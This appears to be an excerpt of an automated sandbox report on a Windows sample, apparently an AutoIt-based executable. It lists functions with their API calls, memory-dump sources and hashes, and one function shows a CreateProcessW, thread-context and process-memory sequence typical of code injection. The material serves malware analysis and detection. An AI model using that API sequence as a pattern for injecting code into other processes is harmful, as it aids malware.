                                                            • std::exception::exception.LIBCMT ref: 0083102C
                                                            • __CxxThrowException@8.LIBCMT ref: 00831041
                                                              • Part of subcall function 008387DB: RaiseException.KERNEL32(?,?,?,008CBAF8,00000000,?,?,?,?,00831046,?,008CBAF8,?,00000001), ref: 00838830
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 6b468a16c0f8ed4f916da9fa6954eff2577cf7d821c761bb0aa0e47568166676
                                                            • Instruction ID: 4a550cc53982a4f02b01d67f45dcd25544a6f61a59f937be468b86c0348a8cb4
                                                            • Opcode Fuzzy Hash: 6b468a16c0f8ed4f916da9fa6954eff2577cf7d821c761bb0aa0e47568166676
                                                            • Instruction Fuzzy Hash: 9CF0F93450071DA6CB24EA9CEC1A9DF77A8FF41750F100425F904D1982DFB08A8486D1
                                                            Function 0083582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __lock_file_memset
                                                            • String ID:
                                                            • API String ID: 26237723-0
                                                            • Opcode ID: 55bcbfde0126098b3e7e8643d093346018807e05f199f82b985b58b8fc47da89
                                                            • Instruction ID: e5b2d7ea2db1cb484645d32a0458bd40979727e9aef307725819b6358b7557a3
                                                            • Opcode Fuzzy Hash: 55bcbfde0126098b3e7e8643d093346018807e05f199f82b985b58b8fc47da89
                                                            • Instruction Fuzzy Hash: F1012171801A09EBCF12AF6D8C0699F7B61FFC0760F158225B824DB1A1DB358A21DBD2
                                                            Function 008355D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            • __lock_file.LIBCMT ref: 0083561B
                                                              • Part of subcall function 00836E4E: __lock.LIBCMT ref: 00836E71
                                                            • __fclose_nolock.LIBCMT ref: 00835626
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 48e1829f4800e1be491f4eff05f3d4cb3c1758feffda1028b058b6e3c89ef5c0
                                                            • Instruction ID: 169a610786c3d403d3382dd38268df23305028cc8669deacc2a6b981f7e44c49
                                                            • Opcode Fuzzy Hash: 48e1829f4800e1be491f4eff05f3d4cb3c1758feffda1028b058b6e3c89ef5c0
                                                            • Instruction Fuzzy Hash: 92F09071904B05DAD721AB7D880376EA7A1FFD0334F658209B824EB1C1DF7C8A019BD6
                                                            Function 0244129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02441A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02441AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02441B13
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                            • Instruction ID: 0d95ad7d48b05499c958a0ec4c86cc3e3ee04bbfe2e9608478a0d13b261b1a21
                                                            • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                            • Instruction Fuzzy Hash: 7412BD24E24658C6EB24DF64D8507DEB232EF68700F1090E9910DEB7A5E77A4F81CF5A
                                                            Function 0081F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71a15e9944377db040660174e253baae9efc1531ff06e00263abb64994a6aa91
                                                            • Instruction ID: e44202cd487241d0198d235b7ff06a650e73c7b560764767cdcd75be201fef93
                                                            • Opcode Fuzzy Hash: 71a15e9944377db040660174e253baae9efc1531ff06e00263abb64994a6aa91
                                                            • Instruction Fuzzy Hash: BF619C7060060A9FCB14DF68C991AEAB7E9FF48308F148479EA0AD7252E731ED95CB51
                                                            Function 00822123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f6f246b76be45e66eb009a1b7a0934b5936620c0ea3b4f5870f82eb27d4b2fb
                                                            • Instruction ID: 7af1348308ce3e5003aab563b1b8917fdd2578a13849cf5e61a44044bd94a4f2
                                                            • Opcode Fuzzy Hash: 5f6f246b76be45e66eb009a1b7a0934b5936620c0ea3b4f5870f82eb27d4b2fb
                                                            • Instruction Fuzzy Hash: F4519F34600614EFCF14EB68D991EAE77A9FF84310F148068F946EB382DA30ED54CB42
                                                            Function 0081766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 0749668f09d687d3419381967738c62aff8acc7792b4f3907a803470fc18d96a
                                                            • Instruction ID: b3ecd135d1c22e005a4db903f2707cdbacd78ce3ed739ab5fcd620fdede1a6b0
                                                            • Opcode Fuzzy Hash: 0749668f09d687d3419381967738c62aff8acc7792b4f3907a803470fc18d96a
                                                            • Instruction Fuzzy Hash: F7318D79208A02DFD7249F1CD490A61F7B8FF49310B14C56DE98ACB7A5EB30E881CB84
                                                            Function 00815C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00815CF6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: ff02e83a3575322d242739734592aacf5b1518e730975cbe5472602d2ecdad89
                                                            • Instruction ID: a289fdc1fa1d65a8fab01df05a17b8498fea61b3a67feddf87aeb3956ed24153
                                                            • Opcode Fuzzy Hash: ff02e83a3575322d242739734592aacf5b1518e730975cbe5472602d2ecdad89
                                                            • Instruction Fuzzy Hash: F6312A71A00B09EFCB18DF2DD484A99B7B9FF88314F148629D819D3714D771A9A0DBD1
                                                            Function 008500D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: dd2f11c8cfb62c54127fbbbe609f88f94f7e11b9942c25c46df6707fd9827a7a
                                                            • Instruction ID: 2251c4f8bf12fb2e06fb613f2e4d00083bc0a5103c5d4b1a3f678d57e6a26866
                                                            • Opcode Fuzzy Hash: dd2f11c8cfb62c54127fbbbe609f88f94f7e11b9942c25c46df6707fd9827a7a
                                                            • Instruction Fuzzy Hash: C541F574508751CFDB28DF18C494B5ABBE0FF45318F19889CE9898B362C336E889CB52
                                                            Function 008179AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction ID: c326e2b2e3e146930155055bb73f7ecbec8bd04ddc5964c031fad5e20e9fc912
                                                            • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction Fuzzy Hash: 4811B431208215AFD714DF1CC491CAEB7ADFF45324724851EE815DB291DF32AC9187D1
                                                            Function 00814F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00814D13: FreeLibrary.KERNEL32(00000000,?), ref: 00814D4D
                                                              • Part of subcall function 0083548B: __wfsopen.LIBCMT ref: 00835496
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814F6F
                                                              • Part of subcall function 00814CC8: FreeLibrary.KERNEL32(00000000), ref: 00814D02
                                                              • Part of subcall function 00814DD0: _memmove.LIBCMT ref: 00814E1A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: 89167d8bad53f84d1bd6accd18c69874742877d1481a1a90c31d18a766dbd101
                                                            • Instruction ID: 57b3a6a2c31625243dea34e916660f78cdec380763e069f6db45b16111b60bb2
                                                            • Opcode Fuzzy Hash: 89167d8bad53f84d1bd6accd18c69874742877d1481a1a90c31d18a766dbd101
                                                            • Instruction Fuzzy Hash: F611B231600609AACB14AF68D802BEE77A9FF44710F208429F541E6281DEB59A459792
                                                            Function 008501AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: ee8f55f1862763acc9a2a6d3a791b11013a6a072864b2c2109a3863828dc147a
                                                            • Instruction ID: efa6bcf2354b47ffe2c38b2a83cdca54267f26568499cf673b7d68441b6119ae
                                                            • Opcode Fuzzy Hash: ee8f55f1862763acc9a2a6d3a791b11013a6a072864b2c2109a3863828dc147a
                                                            • Instruction Fuzzy Hash: 68212474508341DFCB18DF54C444A5ABBE4FF84714F048968E98A87722D731E889CB93
                                                            Function 00815D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00815807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00815D76
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 26465eda57a213b72750b05889a87484c8771c4a24fa3922ebeeb2633f57ec1f
                                                            • Instruction ID: fde9f2437f46c8c15124b6840b32bdc18203b996891937d402becea0909ddbb6
                                                            • Opcode Fuzzy Hash: 26465eda57a213b72750b05889a87484c8771c4a24fa3922ebeeb2633f57ec1f
                                                            • Instruction Fuzzy Hash: 51112871200B05DFD3208F15E484BA2B7F9FF85750F14892EE5AAC6A50D770E985CB60
                                                            Function 0086FC4D Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: bd844d38082ec7db0857c79c1d4551c660cff673e6622551cfcfe10db31e1ef2
                                                            • Instruction ID: d3fd7e50bd886c588f3f93780fec1184ab47b00cee3f5ce372599864cf40cabc
                                                            • Opcode Fuzzy Hash: bd844d38082ec7db0857c79c1d4551c660cff673e6622551cfcfe10db31e1ef2
                                                            • Instruction Fuzzy Hash: 6F01A972200225ABCB28DF2DD89196BB7A9FFC5754715443EFD0ACB245E631E901C7D1
                                                            Function 00817F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 7f77c286925e9f1bc2ad53be9e91a56bbcda69852cea014de80fe29da213b29f
                                                            • Instruction ID: 920364b882a18d441edfc710f13b7ff63380edc568da36030ae8f3ae5a0dc724
                                                            • Opcode Fuzzy Hash: 7f77c286925e9f1bc2ad53be9e91a56bbcda69852cea014de80fe29da213b29f
                                                            • Instruction Fuzzy Hash: 0301D6722047056ED7245B28DC06FA7BBA8FF84760F10852EF65ACA2D1EE31E4418B90
                                                            Function 00884583 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 008845C0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID:
                                                            • API String ID: 1431749950-0
                                                            • Opcode ID: 5eb2f71de629e502ee22c088bb45d0cc4a48bc2dd22da86109d7cb4c1707496f
                                                            • Instruction ID: e791f8b45d0b3a3058d152552378ed29c06f96c59381ae669284dfbda7ee57b4
                                                            • Opcode Fuzzy Hash: 5eb2f71de629e502ee22c088bb45d0cc4a48bc2dd22da86109d7cb4c1707496f
                                                            • Instruction Fuzzy Hash: D3F03135604145AF8B14EB68D846C9F7BBCFF85720F00405AF905DB251DE70A941C7A1
                                                            Function 00834A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00834AD6
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 9312cd671523439e637408faed9196b0a28c2256c0e1bf78069c5a2cd7332c59
                                                            • Instruction ID: 7d28ed690e0da6f41fe7664feac436b2bcccfbfeca60ebcad70e94bc8877a0ac
                                                            • Opcode Fuzzy Hash: 9312cd671523439e637408faed9196b0a28c2256c0e1bf78069c5a2cd7332c59
                                                            • Instruction Fuzzy Hash: C6F08C31940219EBDF61AF688C0679E76A1FF80325F148514B824EA1D1DB789E50DBD2
                                                            Function 00814FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814FDE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 65c13388fa5322ce2f7d746c9d8fa1256b258a660f47421c8e89bd10dd43dfe5
                                                            • Instruction ID: 8d9ff2c22765353f071b89834296dc0fb24bd4db1479fc46d1b1e7be98d1d833
                                                            • Opcode Fuzzy Hash: 65c13388fa5322ce2f7d746c9d8fa1256b258a660f47421c8e89bd10dd43dfe5
                                                            • Instruction Fuzzy Hash: 99F03971105716CFCB349F64E494892BBE9FF043293249A3EE1D6C2710CB72A895DF80
                                                            Function 008309D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008309F4
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
